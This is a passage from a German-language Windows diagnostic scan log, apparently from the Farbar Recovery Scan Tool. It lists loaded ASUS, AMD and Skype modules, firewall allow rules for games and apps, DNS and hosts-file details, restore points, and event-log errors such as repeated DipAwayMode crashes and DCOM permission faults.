2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-21 20:55 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2017-05-21 20:57 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}

Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xbd0
Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xde4
Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x203c
Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xe7c
Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0xe04
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0x2788
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:


Systemfehler:
=============
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: Weltz)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
